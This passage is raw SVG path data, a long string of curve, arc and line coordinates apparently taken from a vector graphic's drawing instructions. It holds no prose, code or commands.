4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4